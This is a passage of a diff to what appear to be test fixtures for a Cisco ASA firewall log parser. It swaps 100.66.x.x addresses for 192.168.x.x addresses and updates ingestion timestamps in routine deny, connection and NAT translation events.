tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995254300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7133,8 +7133,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7168,7 +7168,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164958900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995260900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164963800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995267200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164970900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995273600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164978800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995280Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164986Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995287300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164992100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995291600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-06T20:55:00.164998200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:33:41.995296600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165005100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:33:41.995303600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165010Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:33:41.995310200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165016100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:33:41.995314700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165024200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995319900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165032100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:33:41.995326200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165040300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:33:41.995331100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-06T20:55:00.165048400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:33:41.995372700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165054Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:33:41.995380500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165058900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:33:41.995385500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165063600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:33:41.995390700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165069100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:33:41.995397100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165073500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:33:41.995403400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165077900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:33:41.995409700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165081800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:33:41.995416Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165087Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:33:41.995422500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165092700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:33:41.995428900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165100900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:33:41.995435100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165105700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:33:41.995441300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165110400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:33:41.995447700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165116Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:33:41.995454100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-06T20:55:00.165122200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:33:41.995460400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-10-06T20:55:00.165129Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": 